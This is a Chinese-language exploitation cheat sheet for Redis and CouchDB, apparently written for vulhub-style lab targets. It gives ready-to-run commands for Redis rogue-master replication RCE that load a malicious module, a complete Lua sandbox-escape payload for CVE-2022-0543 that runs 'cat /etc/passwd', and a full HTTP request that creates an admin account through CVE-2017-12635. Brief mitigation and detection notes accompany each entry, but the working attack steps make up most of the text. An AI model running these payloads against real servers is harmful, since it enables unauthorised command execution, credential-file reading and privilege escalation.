redis

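# 未授权访问 + 主从复制加载恶意模块导致命令执行 (CNVD-2019-21763)
# 前提：Redis 未设置认证且端口可被访问。防护：配置 requirepass/ACL、bind 到内网地址并保持 protected-mode 开启、以非 root 用户运行，并通过 rename-command 或 ACL 限制 SLAVEOF/REPLICAOF、MODULE、CONFIG 等命令。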
https://github.com/vulhub/redis-rogue-getshell
./redis-master.py -r 目标IP -p 目标端口 -L 172.31.0.66 -P 8888 -f RedisModulesSDK/exp.so -c "cat /etc/passwd"

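# Redis(<=5.0.5) RCE：与上一条同属"主从复制 + 模块加载"的利用方式，前提同样是未授权访问
# 检测：关注非预期的 SLAVEOF/REPLICAOF、MODULE LOAD 命令，以及 Redis 数据目录下新出现的 .so 文件。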
https://github.com/n0b0dyCN/redis-rogue-server
./redis-rogue-server.py --rhost 172.31.0.10 --rport 11874 --lhost 127.0.0.1

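# 沙箱绕过RCE-CVE-2022-0543
# 仅影响 Debian/Ubuntu 打包的 Redis：打包方式导致 Lua 沙箱中残留 package 全局变量，可通过 package.loadlib 加载任意动态库。修复：升级发行版提供的 redis 软件包；检测：审计 EVAL 脚本中出现的 package.loadlib。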
eval 'local io_l = package.loadlib("/usr/lib/x86_64-linux-gnu/liblua5.1.so.0", "luaopen_io"); local io = io_l(); local f = io.popen("cat /etc/passwd", "r"); local res = f:read("*a"); f:close(); return res' 0

couchdb

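# 垂直权限绕过(CVE-2017-12635)
# 影响 CouchDB 1.7.0 之前及 2.x 的 2.1.1 之前版本：Erlang 与 JavaScript 的 JSON 解析器对重复键的处理不同，请求体中的两个 "roles" 使校验逻辑与实际授权逻辑看到的角色不一致。修复：升级到 1.7.0 / 2.1.1 或更高版本，并审计 _users 库中带 _admin 角色的非预期账号。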
# 1、先创建用户
PUT http://172.31.0.10:5984/_users/org.couchdb.user:tanqidi HTTP/1.1
Host: 172.31.0.10:5984
Accept-Language: zh-CN,zh;q=0.9
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 112

{
  "type": "user",
  "name": "tanqidi",
  "roles": ["_admin"],
  "roles": [],
  "password": "tanqidi"
}

# 2、使用上一步创建的账号登录管理界面(_utils)，确认该账号是否获得管理员权限
http://172.31.0.10:5984/_utils/#